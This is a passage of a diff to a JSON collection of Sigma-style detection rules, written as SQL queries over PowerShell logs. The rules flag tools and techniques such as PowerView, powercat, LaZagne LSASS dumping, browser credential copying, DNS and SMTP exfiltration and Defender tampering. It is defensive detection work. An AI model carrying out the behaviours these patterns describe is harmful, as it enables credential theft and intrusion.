LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "status": "experimental", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration", + "attack.t1048.003" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], + "filename": "posh_ps_send_mailmessage.yml" + }, + { + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_frombase64string_archive.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "description": "Detects usage of the \"Import-Module\" 
cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or 
service, or source code/binary files containing embedded passwords.\n", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001" + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", "status": "experimental", - 
"description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { "title": "PowerShell Remote Session Creation", 
@@ -5632,15 +5489,28 @@ "filename": "posh_ps_remote_session_creation.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.credential_access", "attack.execution", "attack.t1059.001" ], 
@@ -5649,94 +5519,99 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE 
'\\')" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": 
"Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -5745,170 +5620,153 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Troubleshooting Pack Cmdlet Execution", + "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND 
ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "status": "experimental", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR 
